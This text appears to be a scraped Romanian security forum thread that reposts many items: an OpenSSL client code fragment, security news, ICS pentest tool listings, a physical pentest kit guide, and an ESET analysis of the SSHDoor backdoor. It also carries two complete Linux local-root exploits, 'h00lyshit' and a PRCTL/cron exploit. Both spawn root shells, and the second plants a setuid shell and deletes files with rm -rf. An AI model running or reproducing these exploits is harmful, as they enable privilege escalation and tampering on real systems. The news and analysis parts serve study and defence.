strcat(tmpbuf,"Host: "); strcat(tmpbuf,host); strcat(tmpbuf,CRLF); if (userpwd){ strcat (tmpbuf,"Authorization: Basic "); strcat (tmpbuf,encode_64(userpwd,"\0")); strcat(tmpbuf,CRLF); } strcat(tmpbuf,CRLF); sprintf(connect_str,"%s:%1u", port==http_proxy_port?proxy_server:host, port); #ifdef WIN32 err = WSAStartup(wVersionRequested,&wsaData); if (err != 0){ printf("%%TELNET-F-CANTLOAD, cannot load winsock.dll"); exit (1); } if ((LOBYTE(wsaData.wVersion) != 2) || (HIBYTE (wsaData.wVersion) != 0)){ printf ("%%TELNET-F-BADVER, incorrect winsock.dll version\r\n"); WSACleanup(); exit (1); } #endif if (strstr(argv[1],https)) https_connection_handle(connect_str,tmpbuf); else http_connection_handle(connect_str,tmpbuf); #ifdef WIN32 WSACleanup(); #endif } ******** encode.c ********* #include <stdlib.h> #include <string.h> #define MAX_LINE 76 /* size of encoded lines */ static char basis_64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; char *encode_64(char *str,char *eol){ unsigned int rlen; int len = strlen(str); int chunk; unsigned char c1,c2,c3; unsigned int eollen; char *r,*out; if (eol) eollen = strlen(eol); else{ eol = "\n"; eollen = 1; } /* calculate the length of the result */ rlen = (len+2) / 3 * 4; /* encoded bytes */ if (rlen) { /* add space for EOL */ rlen += ((rlen-1) / MAX_LINE + 1) * eollen; } /* allocate a result buffer */ out = r = malloc(rlen ? rlen : 1); for (chunk=0; len > 0; len -= 3, chunk++) { if (chunk == (MAX_LINE/4)) { char *c = eol; char *e = eol + eollen; while (c < e) *r++ = *c++; chunk = 0; } c1 = *str++; c2 = *str++; *r++ = basis_64[c1>>2]; *r++ = basis_64[((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4)]; if (len > 2) { c3 = *str++; *r++ = basis_64[((c2 & 0xF) << 2) | ((c3 & 0xC0) >>6)]; *r++ = basis_64[c3 & 0x3F]; } else if (len == 2) { *r++ = basis_64[(c2 & 0xF) << 2]; *r++ = '='; } else { /* len == 1 */ *r++ = '='; *r++ = '='; } } if (rlen) { /* append eol to the result string */ char *c = eol; char *e = eol + eollen; while (c < e) *r++ = *c++; } *r = '\0'; /* every SV in perl should be NUL-terminated */ return(out); } REFERENCE: OpenSSL on-line help and searches on Google The Multithreaded Programming guide THREADTIME from Scott J.NORTON & Mark D/DIPASQUALE Order number : ISBN 0-13-190067-b Publisher : Hewlett-Packard Professionnel Books Sursa: Example-C OpenSSL client and server example

Da-mi cateva exemple cu ce era acum 2 ani pe RST. Apoi tocmai cineva cu un cont de 2 ani si ceva s-a gasit sa comenteze, persoana ale carei posturi nu vreau sa le comentez deoarece sunt in mare parte legate de Havij...

[h=3]ICS Security Analysis — New Pentest Tools[/h]Industrial system (ICS/SCADA) security is a modern trend in information security. However, there is always a shortage of specialized tools for pentest or audit of ICS security. This article covers the latest publications, utilities, and presentations of Positive Technologies experts — all this will help you to ensure industrial system security.. Theory To Start With Understanding of real threats is the core for any information security project. To ease this task, Positive Technologies experts assisted by the community ????? ????? - ????????????? ???? ???????????? ? ??????? ???????????? ????????????? • ??????? ???????? undertook a large-scale study of the ICS systems (ICS/SCADA), the results of which are available here: http://ptsecurity.com/download/SCADA_analytics_english.pdf Two Stories Of The Same Pentest One of the problems of modern ICS is large-scale integrated projects related to MES construction and integration with business systems such as ERP. The report "From ERP to SCADA. Back and Forth. Two Stories of the Same Pentest" [ru] exemplifies what such projects can result in if they do not comply with security requirements. ICS/SCADA/PLC Google/Shodanhq Cheat Sheet Statements that industrial control systems are available via the Internet are usually taken with skepticism. A tool, which allows estimating a threat by yourself, has been published recently. Take notice that devices and systems provided in this list are all enterprise-level systems and will hardly be used to control fridges and microwaves. The following video demonstrates what ICS availability via the Internet can result in: Attention! Do not try to repeat it at home. A vulnerable system can control a very important object, and if it is handled carelessly it may cause damages. If all of a sudden you have detected an ICS available via the Internet, contact its owner or Computer Emergency Response Team, who can eliminate this flaw. Contact GOV-CERT.RU if dealing with the systems of Russia, with regional CERT such as ICS-CERT if dealing with international systems. Anonymous, judging by their Twitter, have already considered this tool, and it scares a little bit. PLCScan This open-code utility allows detecting devices interacting via the S7comm or Modbus protocols in a system. When a device is detected, PLCScan tries to obtain information about its vendor, type, installed modules, and etc. Demonstrating video: The utility is available here: https://code.google.com/p/plcscan/. WinCC Harvester Metasploit WinCC Harvester can be used when access to SCADA WinCC has been obtained to collect additional information about a project, users, and controllers connected to a system. Demonstrating video: The utility is available here: https://github.com/nxnrt/wincc_harvester. Siemens SIMATIC WinCC 7.X Security Hardening Guide A checklist can be used for WinCC configuration in accordance with security requirements and for system security assessment in the course of audits. If a lot of systems are assessed, the procedure can be automated as in case of MaxPatrol. Siemens WinCC / S7 Under The X-ray SCADA Security Scientific Symposium held in Miami on January 16-17 saw the report of Positive Technologies experts related to the results of Siemens WinCC/S7 security research. The report also covered SIMATIC WinCC/WinCC Flexible/TIA Portal and S7 PLC; from a network stack to an application, from a system architecture review to firmware reverse engineering. Sergey Gordeychik, Gleb Gritsay, and Denis Baranov considered almost 50 zero-day vulnerabilities and released a checklist for the configuration of WinCC Flexible 2008. S7 password offline bruteforce tool During the report the experts of Positive Technologies provided also a utility, which can be used to test S7 password strength in the course of audits and pentests. The utility is available here: [Python] s7-brute-offline.py - Pastebin.com. ?????: Positive Research ?? 12:56 AM Sursa: Positive Research Center: ICS Security Analysis — New Pentest Tools

[h=1]Experts: Silent Exploits Still Possible in Java 7, Despite Security Improvements[/h]January 28th, 2013, 08:31 GMT · By Eduard Kovacs Researchers from Security Explorations have identified yet another vulnerability that affects Java 7 Update 11. Dubbed “Issue 53,” the security hole can be exploited to execute malicious code even if the security settings are configured to “Very High.” With the release of Java 7 Update 10, Oracle has made some “very significant” security improvements, including a feature that allows users to control the level of security when unsigned apps are executed in a web browser. In theory, when users set the security level to “Very High,” unsigned (sandboxed) apps cannot be executed within the web browser. However, Security Explorations has found that these security mechanisms are not as effective as they should be. “What we found out and what is a subject of a new security vulnerability (Issue 53) is that unsigned Java code can be successfully executed on a target Windows system regardless of the four Java Control Panel settings,” Adam Gowdiak, CEO of Security Explorations, told Softpedia in an email. “Our Proof of Concept code that illustrates Issue 53 has been successfully executed in the environment of latest Java SE 7 Update 11 (JRE version 1.7.0_11-b21) under Windows 7 OS and with ‘Very High’ Java Control Panel security settings,” Gowdiak added. “That said, recently made security ‘improvements’ to Java SE 7 software don't prevent silent exploits at all. Users that require Java content in the web browser need to rely on a Click to Play technology implemented by several web browser vendors in order to mitigate the risk of a silent Java Plugin exploit.” This is not the only vulnerability identified by the Polish security firm in Java 7 Update 11. A few days after Oracle had released the latest update to address a zero-day flaw in Update 10, the experts identified a couple of new security holes (“Issue 51” and “Issue 52”). Sursa: Experts: Silent Exploits Still Possible in Java 7, Despite Security Improvements - Softpedia

[h=1]Red October Scares Russia, Putin Orders New Cyber Security Structure[/h]January 28th, 2013, 08:21 GMT · By Eduard Kovacs - Vladimir Putin orders new cyber security structure Red October is said to be one of the largest cyber espionage campaigns ever. Since Russian organizations have been a target of this operation, President Vladimir Putin has ordered the deployment of a new structure aimed at protecting the country against cyberattacks. The structure will be part of Russia’s Federal Security Service (FSB), The Voice of Russia informs. The country already has several units whose main goal is to defend the its networks against cyberattacks, but experts believe that this is a logical move, considering that the threat is constantly growing. When they released the details on Red October, experts from Kaspersky Lab reveled that Russia was not only a target, but also the country that, along with Germany, hosted the largest number of command and control servers utilized by the cybercriminal operation. Sursa: Red October Scares Russia, Putin Orders New Cyber Security Structure - Softpedia

[h=1]Security Brief: Google Defacements and Blackmail[/h]January 27th, 2013, 08:13 GMT · By Eduard Kovacs Almost each day of this past week we saw headlines which read “Google was defaced.” Google wasn’t actually defaced, but some hacker groups managed to breach various DNS servers and made it look like Google websites had been defaced. Iranian hackers defaced YouTube, Intel, Gmail and Google Turkmenistan. Then, Pakistani hackers from the PAKbugs collective made it look like Google Morocco and Google Saint Helena were hacked. Cyber News reports that some high-profile sites from Uganda might have had the same fate. Extortionist hackers from the Rex Mundi collective are back. After they unsuccessfully tried to blackmail Drake International, now they’ve set sights on Belgian financial institutions Buy Way. The company’s representatives told us that they had no intention of paying the hackers because they didn’t want to “finance crime economy.” We’ve also seen some interesting hacks this week. However, the biggest one of them appears to be the one that targeted the United States Sentencing Commission. Anonymous hacktivists defaced the USSC website, explaining that the FBI’s recent infiltrations haven’t discouraged them. Another hack worth mentioning is the one which targeted MIT. The institute’s website was hacked for the second time in response to Aaron Swartz’s death. Operation Ababil 2 continues. This week, Izz ad-Din al-Qassam Cyber Fighters launched DDOS attacks against not one, not two, but 24 US bank websites. They started with PNC, Wells Fargo, Regions, Bank of America, Citibank, Harris, BankZions, Capital One, Huntington and BT&T. Then, they added 14 new financial institutions to their target list: Synovus Bank, Bank of the West, Union Bank, Umpqua Bank, University Federal Credit Union, UMB Bank, People's United Bank, Patelco Credit Union, M&T Bank, First Citizens Bank, Citizens Bank, Key Bank, BBVA Compass, and Comerica. In the arrests/convictions/charges section we had the two British Anonymous hackers who were sentenced to jail for launching DDOS attacks on PayPal. We’ve also learned that self-proclaimed Anonymous spokesperson Barrett Brown has been hit with new charges. In addition, three individuals suspected of being involved in the creation and distribution of the Gozi malware have been charged in a Manhattan court. Sursa: Security Brief: Google Defacements and Blackmail - Softpedia

Counter-Stike and X3: Reunion Support Linux Submitted by nibulix on Sun, 01/27/2013 - 18:08 The wave of new games coming to Linux doesn't stop after the release of Steam Beta for Linux. Recently Counter-Stike and X3: Reunion were activated for Linux and can be played on Linux now, even if they are not labeled as such on Steam. But not only older titles are released for Linux. One of the most successful strategy games of the last time, Crusader Kings II, was published for Linux recently. Sursa: Counter-Stike and X3: Reunion Support Linux | Steam for Linux

Pentagon to boost cybersecurity force RICK WILKING/Reuters - A network defender works at the Air Force Space Command Network Operations & Security Center in Colorado Springs, Colorado. The Pentagon is expanding efforts to safeguard critical computer systems and conduct cyberattacks against foreign adversaries, officials say. By Ellen Nakashima, Monday, January 28, 12:42 AM The Pentagon has approved a major expansion of its cybersecurity force over the next several years, increasing its size more than fivefold to bolster the nation’s ability to defend critical computer systems and conduct offensive computer operations against foreign adversaries, according to U.S. officials. The move, requested by the head of the Defense Department’s Cyber Command, is part of an effort to turn an organization that has focused largely on defensive measures into the equivalent of an Internet-era fighting force. The command, made up of about 900 personnel, will expand to include 4,900 troops and civilians. Details of the plan have not been finalized, but the decision to expand the Cyber Command was made by senior Pentagon officials late last year in recognition of a growing threat in cyberspace, said officials, who spoke on the condition of anonymity because the expansion has not been formally announced. The gravity of that threat, they said, has been highlighted by a string of sabotage attacks, including one in which a virus was used to wipe dat a from more than 30,000 computers at a Saudi Arabian state oil company last summer. The plan calls for the creation of three types of forces under the Cyber Command: “national mission forces” to protect computer systems that undergird electrical grids, power plants and other infrastructure deemed critical to national and economic security; “combat mission forces” to help commanders abroad plan and execute attacks or other offensive operations; and “cyber protection forces” to fortify the Defense Department’s networks. Targeting ‘malicious actors’ Although the command was established three years ago for some of these purposes, it has largely been consumed by the need to develop policy and legal frameworks and ensure that the military networks are defended. Current and former defense officials said the plan will allow the command to better fulfill its mission. “Given the malicious actors that are out there and the development of the technology, in my mind, there’s little doubt that some adversary is going to attempt a significant cyberattack on the United States at some point,” said William J. Lynn III, a former deputy defense secretary who helped fashion the Pentagon’s cybersecurity strategy. “The only question is whether we’re going to take the necessary steps like this one to deflect the impact of the attack in advance or .?.?. read about the steps we should have taken in some post-attack commission report.” Although generally agreed to by the military’s service chiefs, the plan has raised concerns about how the Army, Navy, Marines and Air Force will find so many qualified cybersecurity personnel and train them. It also raises deeper issues — which are likely to intensify as the Cyber Command grows over the years — about how closely the command should be aligned with the National Security Agency, the giant electronic-spying agency that provides much of its intelligence support. The head of the Cyber Command, Gen. Keith B. Alexander, is also the director of the NSA, which employs some of the nation’s most advanced cyber-operations specialists. The new force structure was alluded to last fall in a major speech by Defense Secretary Leon E. Panetta, who said, “Our mission is to defend the nation,” and noted that the department was “putting in place the policies and organizations we need to execute the mission.” In an interview, a senior defense official said that the “national mission” teams would focus their efforts overseas and that any actions they took would be directed outside U.S. networks — unless the teams were asked to provide assistance to another agency with domestic authority, such as the FBI. “There’s no intent to have the military crawl inside industry or private networks and provide that type of security,” the official said. He stressed that the military would act only in cases in which there was a threat of an attack that could “really hurt,” adding: “We’re not talking about doing something to make sure that Mrs. Smith’s bank account didn’t get hijacked by somebody.” The plan to expand the Cyber Command comes at a time when the military’s services are being ordered to cut spending, a reflection of how important senior military officials consider the need to improve the nation’s cybersecurity footing. Some military officials have grudgingly accepted the need to contribute personnel to an expanded cybersecurity force. There are also differences over how much control the combatant commands will have over cyber teams. The “combat mission” teams may help commanders in operations such as a cyber component to disable an enemy’s command-and-control system before a conventional attack. Each region will have teams that focus on particular threats — say, from China or Iran. “You get the resource guys sucking a lot of air through their teeth because they know their service chiefs have backed it,” one Navy official said. “So they have to find the resources to pay for the people.” Alignment with NSA Some military and defense officials questio whether the Cyber Command can reach its full potential as a military command as long as it is so dependent on the NSA and is led by the NSA’s director. The close relationship between the two has had its advantages, officials say: The agency can peer into foreign networks and provide the command with intelligence, including in cases in which an adversary is suspected of planning a computer attack or developing a potent virus. “That gives you an advantage of being able to plan for and be prepared to react,” the defense official said. But the NSA is so intertwined with the Cyber Command — the two operations centers are located side by side, and, until recently, some Cyber Command personnel had nsa.gov e-mail addresses — that some current and former officials wonder whether the military command can create an independent, strategic doctrine. The concern is that the intelligence agency’s priorities will dominate, with an emphasis on the development of tools that are useful for surveillance but not necessarily for disrupting adversaries. There’s a “cogent argument” to be made that for the Cyber Command to become a true military command, “you sever that” relationship, one military official said. But, in fact, said one former intelligence official, the NSA uses military personnel to do much of its work and pays for a good portion of the services’ cyber operators. “That’s been the plan all along,” the former official said. “Take the talent resident in NSA, turn it into [cyber] attack talent.” With the decision to expand the Cyber Command, Alexander, who has been asked to stay on until summer 2014, is seeing some of his vision fulfilled. He has sought independent budget authority for the Cyber Command to hire and control forces, similar to the way Special Operations Command can. He has not won that authority, though officials agreed to give him the additional forces. He also has the support of senior Pentagon officials to elevate the Cyber Command to full command status, out from under the aegis of Strategic Command. But that move, which requires consulting with Congress, is not happening just yet, officials say. Sursa: Pentagon to boost cybersecurity force - The Washington Post

[h=1]Microsoft Office Command Execution 0day Being sold for $20,000[/h]Posted by: FastFlux on January 25, 2013 The 1337day team has just posted a exploit, which is going for 20,000 USD. This 0day is contained Microsoft Office and affects versions 2003, 2007 and 2010. It was place under “Remote Exploits” category and the description was: “Microsoft Office 2003/2007/2010 all service pack from a command execution vulnerability .” The team also included a Youtube demonstrating the exploit and proving that it’s real. These types of 0days can be detrimental to all windows users, both home users and businesses utilize Microsoft Office on a daily basis making this a critical exploit. You can view and purchase the exploit, here. Sursa: Microsoft Office Command Execution 0day Being sold for $20,000

[h=3]CentOS Linux bible[/h] [TABLE=width: 100%] [TR] [TD] [/TD] [/TR] [TR] [TD=colspan: 3] This is a guide to the CentOS Linux operating system. Linux guru Tim Bornocyzyk, thoroughly covers the topic whether you're a Linux novice or a regular who now wants to master this increasingly popular distribution. First find out how to install and configure CentOS. From there, you'll cover a wealth of Linux and CentOS tools, functions, and techniques, including: how to work in the GNOME and KDE desktop environments; how to use the Linux shell, file system, and text editor; how to configure CUPS printers, Samba for file and printer sharing and other features using GUI tools; and more. [/TD] [/TR] [TR] [TD=colspan: 2][h=5]Size:[/h] [/TD] [TD=width: 35%]18Mb[/TD] [/TR] [TR] [TD=colspan: 2][h=5]Publication year:[/h] [/TD] [TD=width: 35%]2009[/TD] [/TR] [TR] [TD=colspan: 2][h=5]Book language:[/h] [/TD] [TD=width: 35%]English[/TD] [/TR] [TR] [TD=colspan: 3, align: center] [/TD] [/TR] [TR] [TD=colspan: 3, align: center] [h=3]Download[/h][/TD] [/TR] [/TABLE] Via: CentOS Linux bible | Linux Ubuntu - Linux Books - Linux Distribution

Hacker Opens High Security Handcuffs With 3D-Printed And Laser-Cut Keys Andy Greenberg, Forbes Staff Two 3D-printed and one laser-cut copy of restricted handcuff keys. (Click to enlarge.) The security of high-end handcuffs depends on a detainee not having access to certain small, precisely-shaped objects. In the age of easy 3D printing and other DIY innovations, that assumption may no longer apply. In a workshop Friday at the Hackers On Planet Earth conference in New York, a German hacker and security consultant who goes by the name “Ray” demonstrated a looming problem for handcuff makers hoping to restrict the distribution of the keys that open their cuffs: With plastic copies he cheaply produced with a laser-cutter and a 3D printer, he was able to open handcuffs built by the German firm Bonowi and the English manufacturer Chubb, both of which attempt to control the distribution of their keys to keep them exclusively in the hands of authorized buyers such as law enforcement. The demonstration highlights a unique problem for handcuff makers, who design their cuffs to be opened by standard keys possessed by every police officer in a department, so that a suspect can be locked up by one officer and released by another, says Ray. Unlike other locks with unique keys, any copy of a standard key will open a certain manufacturer’s cuff. “Police need to know that every new handcuff they buy has a key that can be reproduced,” he says. “Until every handcuff has a different key, they can be copied.” Ray presenting his work at the HOPE conference. (Click to enlarge.) Unlike keys for more common handcuffs, which can be purchased (even in forms specifically designed to be concealable) from practically any survivalist or police surplus store, Bonowi’s and Chubb’s keys can’t be acquired from commercial vendors. Ray says he bought a Chubb key from eBay, where he says they intermittently appear, and obtained the rarer Bonowi key through a source he declined to name. Then he precisely measured them with calipers and created CAD models, which he used to reproduce the keys en masse, both in plexiglass with a friend’s standard laser cutter and in ABS plastic with a Repman 3D printer. Both types of tools can be found in hacker spaces around the U.S. and, in the case of 3D printers, thousands of consumers’ homes. A Bonowi key (top) and a Chubb key (bottom) with a laser cut plexiglass key that opens either between them. (Click to enlarge.) Over the weekend, a lockpick vendor at the HOPE conference was already selling dozens of the plexiglass Chubb keys for a mere $4 each. Ray says he plans to upload the CAD files for the Chubb key to the 3D-printing Web platform Thingiverse after the annual lockpicking conference LockCon later this week. I reached out to both Chubb and Bonowi’s parent company Assa Abloy over the weekend, and will update this story when I hear back from them. Ray also tried creating duplicate plexiglass key for high-security handcuffs from the German manufacturer Clejuso, but found that when the cuffs were fully secured the plexiglass wasn’t strong enough to overcome their internal springs. An attendee at the workshop helpfully suggested he try laser-cutting the stronger material Lexan instead. Dozens of Chubb keys being reproduced in a laser-cutter. (Click to enlarge.) Ray, who typically works as a computer security consultant but has also advised the German police on handcuff technology, says his goal isn’t to reduce handcuffs’ security so much as to exposing their vulnerabilities. His tools, he argues, are already available to criminals along with the rest of the public. “If someone is planning a prison or court escape, he can do it without our help,” says Ray. “We’re just making everyone aware, both the hackers and the police.” Sursa: Hacker Opens High Security Handcuffs With 3D-Printed And Laser-Cut Keys - Forbes

Local race - Linux 2.6 ALL - h00lyshit /* ** Author: h00lyshit ** Vulnerable: Linux 2.6 ALL ** Type of Vulnerability: Local Race ** Tested On : various distros ** Vendor Status: unknown ** ** Disclaimer: ** In no event shall the author be liable for any damages ** whatsoever arising out of or in connection with the use ** or spread of this information. ** Any use of this information is at the user's own risk. ** ** Compile: ** gcc h00lyshit.c -o h00lyshit ** ** Usage: ** h00lyshit <very big file on the disk> ** ** Example: ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1 ** ** if y0u dont have one, make big file (~100MB) in /tmp with dd ** and try to junk the cache e.g. cat /usr/lib/* >/dev/null ** */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/prctl.h> #include <sys/mman.h> #include <sys/wait.h> #include <linux/a.out.h> #include <asm/unistd.h> static struct exec ex; static char *e[256]; static char *a[4]; static char b[512]; static char t[256]; static volatile int *c; /* h00lyshit shell code */ __asm__ (" __excode: call 1f \n" " 1: mov $23, %eax \n" " xor %ebx, %ebx \n" " int $0x80 \n" " pop %eax \n" " mov $cmd-1b, %ebx \n" " add %eax, %ebx \n" " mov $arg-1b, %ecx \n" " add %eax, %ecx \n" " mov %ebx, (%ecx) \n" " mov %ecx, %edx \n" " add $4, %edx \n" " mov $11, %eax \n" " int $0x80 \n" " mov $1, %eax \n" " int $0x80 \n" " arg: .quad 0x00, 0x00 \n" " cmd: .string \"/bin/sh\" \n" " __excode_e: nop \n" " .global __excode \n" " .global __excode_e \n" ); extern void (*__excode) (void); extern void (*__excode_e) (void); void error (char *err) { perror (err); fflush (stderr); exit (1); } /* exploit this shit */ void exploit (char *file) { int i, fd; void *p; struct stat st; printf ("\ntrying to exploit %s\n\n", file); fflush (stdout); chmod ("/proc/self/environ", 04755); c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); memset ((void *) c, 0, 4096); /* slow down machine */ fd = open (file, O_RDONLY); fstat (fd, &st); p = (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); if (p == MAP_FAILED) error ("mmap"); prctl (PR_SET_DUMPABLE, 0, 0, 0, 0); sprintf (t, "/proc/%d/environ", getpid ()); sched_yield (); execve (NULL, a, e); madvise (0, 0, MADV_WILLNEED); i = fork (); /* give it a try */ if (i) { (*c)++; !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise"); prctl (PR_SET_DUMPABLE, 1, 0, 0, 0); sched_yield (); } else { nice(10); while (!(*c)); sched_yield (); execve (t, a, e); error ("failed"); } waitpid (i, NULL, 0); exit (0); } int main (int ac, char **av) { int i, j, k, s; char *p; memset (e, 0, sizeof (e)); memset (a, 0, sizeof (a)); a[0] = strdup (av[0]); a[1] = strdup (av[0]); a[2] = strdup (av[1]); if (ac < 2) error ("usage: binary <big file name>"); if (ac > 2) exploit (av[2]); printf ("\npreparing"); fflush (stdout); /* make setuid a.out */ memset (&ex, 0, sizeof (ex)); N_SET_MAGIC (ex, NMAGIC); N_SET_MACHTYPE (ex, M_386); s = ((unsigned) &__excode_e) - (unsigned) &__excode; ex.a_text = s; ex.a_syms = -(s + sizeof (ex)); memset (b, 0, sizeof (); memcpy (b, &ex, sizeof (ex)); memcpy (b + sizeof (ex), &__excode, s); /* make environment */ p = b; s += sizeof (ex); j = 0; for (i = k = 0; i < s; i++) { if (!p[i]) { e[j++] = &p[k]; k = i + 1; } } /* reexec */ getcwd (t, sizeof (t)); strcat (t, "/"); strcat (t, av[0]); execve (t, a, e); error ("execve"); return 0; } Sursa: Local root exploits

Local root 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp #!/bin/sh # # PRCTL local root exp By: Sunix # + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp # tested on Intel(R) Xeon(TM) CPU 3.20GHz # kernel 2.6.9-22.ELsmp # maybe others ... # Tx to drayer & RoMaNSoFt for their clear code... # # zmia23@yahoo.com cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); system("/bin/sh"); system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/*"); return 0; } __EOF__ echo "wait aprox 4 min to get sh" cd /tmp cc -o s s.c cc -o getsuid getsuid.c ./getsuid ./s rm -rf getsuid* rm -rf s.c rm -rf prctl.sh Sursa: Local root exploits

Physical Penetration Testing Toolkit Most penetration testing companies provide and physical penetration testing as part of their services.Some of them are taking this service more seriously than others as they are spending part of their budget to obtain specialized costumes and equipment that can be used in physical penetration tests.In this article we will examine some of the equipment that is necessary to have if we are going to conduct a physical penetration test. Get Of Jail Free Card This is usually a signed letter from the client which states that the penetration tester is authorized to perform the test and the client is aware.This type of letter will work as a proof in case that things go bad and you will get caught by the security personnel or the police authorities.So the letter must include the contact details of the people that they are aware that a test is performed (preferably people in higher level positions) and must be reachable during the test.This letter should never be forgotten by the penetration tester and it is a good practice to have at least 2 original copies in case that one is lost accidentally or is destroyed. Get Out Of Jail Template Cameras Cameras are important equipment because you can take photos of client documents,facilities and the areas that you have managed to gain access.These photos can be used as evidence in the penetration testing report afterwards.Of course cameras of mobiles phones can be used as well but it is recommended a proper digital camera with large amount of memory. Camera Binoculars Binoculars are useful in cases that you want to observe the security guards from long distance or you want to perform shoulder surfing attacks against the employees of your client.For portability reasons and for not raising any alerts it is advised to buy binoculars that can fit into your pocket. Portable Binoculars Laptops In a physical penetration test someone will assume that a laptop is not needed because all you have to do is to physical penetrate.Wrong!In case that you want to construct a scenario where you will disguise as an employee of the company a laptop is a critical component.Additionally you can have a case where the client will require from you to manage to attach into the internal network. Laptop GPS A GPS device can help you in many ways.First of all you can have an idea of the location that you are going to attack by observing satellite photos before the test.Alternatively you can use Google maps for that but the GPS has the advantage that you can carry it with you during the test and you can mark locations that you want to explore or to avoid.Also it is vital for your support team to know exactly where are you.Before you buy a GPS make sure that the device can export the route that you took in order to include it into the report. GPS Device Lock Picking Tools Of course in a physical penetration test you don’t expect every door to be open so it is essential to have in your bag and a set of lock picking tools.Generally lock picking tools are not very expensive so you will need to choose very carefully the best quality that it will assist your needs as you don’t want to break your client locks. Lock Picking Tools Snap Lock Pick Gun USB Sticks There are scenarios where in a physical penetration test you might require just to plant a USB stick inside the premises of the company that will contain malicious content.This will be the case when the client wants to test their employees awareness against this type of attack.You can use the social engineering toolkit in order to create the malicious USB or you can import your own files. USB Sticks Pwnie Express Tools Pwnie Express is a company that specializes in constructing hardware tools that can be used in physical penetration testing engagements.Most of them are quite expensive but the effectiveness of the tools are high because they look like normal devices so when you will plug them on the network it will be difficult to be discovered by the employees or the administrators.Some of the devices that you can buy are the following: Pwn Plug mini Power Pwn and PwnPhone Pwn Plug Mini Power Pwn Sursa: Physical Penetration Testing Toolkit

Aircrack-Ng Megaprimer Part 1: Airmon-Ng Description: Part 1 in a series covering the tools in the aircrack-ng suite. Part 1 discusses airmon-ng. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Aircrack-Ng Megaprimer Part 1: Airmon-Ng

Linux/SSHDoor.A Backdoored SSH daemon that steals passwords by Sébastien Duquette Malware Researcher In his summary of New Year predictions by security researchers here at ESET, Stephen Cobb pointed to expanded efforts by malware authors to target the Linux operating system. Looks like that might be right: A blog post published by Sucuri yesterday describes a backdoored version of the SSH daemon discovered on compromised servers. Interestingly, this backdoor was used in conjunction with the malicious Apache module Linux/Chapro.A that we blogged about recently. The Secure Shell Protocol (SSH) is a very popular protocol used for secure data communication. It is widely used in the Unix world to manage remote servers, transfer files, etc. The modified SSH daemon described here, Linux/SSHDoor.A, is designed to steal usernames and passwords and allows remote access to the server via either an hardcoded password or SSH key. The strings related to the hidden behaviors are XOR encoded. This is done to avoid easy identification by searching the binary for suspicious strings. We identified a total of 16 encoded strings. The figure below shows the part of the code responsible for decoding the hidden data by xoring it with the constant 0×23. The HTTP protocol is used to send stolen data to a remote server. The information is first encrypted using a 1024-bit RSA key stored in the binary and then Base64 encoded. The data is sent via an HTTP POST request to the server used for data exfiltration. The binary we analyzed contains two hostnames for servers used to collect data: openssh.info and linuxrepository.org. Both names were probably chosen to avoid raising suspicions from the administrators of the compromised servers. At this point in time, both hostnames point to a server hosted in Iceland with IP 82.221.99.69. When the daemon is started, the backdoor sends the IP and port on which the service is running and the hostname of the server. Whenever a user successfully logs onto the compromised server, the username and password are also sent to the remote server. In addition to stealing credentials, the backdoor guarantees persistence on the compromised host for the attacker in two different ways. First, it has a hard-coded password inserted in the code. If any user logs in using this password, he is automatically granted access to the compromised server. The following figure shows the string comparison between the password provided by a user trying to log in and the hardcoded password. Second, the modified binary also carries an SSH key. If a user logs into the server with the private key corresponding to the hard-coded public key, he is automatically granted access. The backdoor can also retrieve configuration data from the file /var/run/.options. If this file exists the backdoor will use the hostname, backdoor password and SSH key stored in it. The variables are stored one per line in cleartext. As with Linux/Chapro.A, it is hard to tell how this Trojanized SSH daemon made its way on a compromised server but outdated applications or weak passwords are probably to blame. Finding backdoored files can be problematic for most system administrators. We recommend regular use of integrity checking tools plus monitoring of outgoing network connections and regular scanning of all files by an antivirus product. This threat is detected by ESET as Linux/SSHDoor.A. Special thanks to Peter Kosinar, Pierre-Marc Bureau, and Olivier Bilodeau for their help. Analyzed sample MD5 hash: 90dc9de5f93b8cc2d70a1be37acea23a Sursa: Linux/SSHDoor.A Backdoored SSH daemon that steals passwords | ESET ThreatBlog

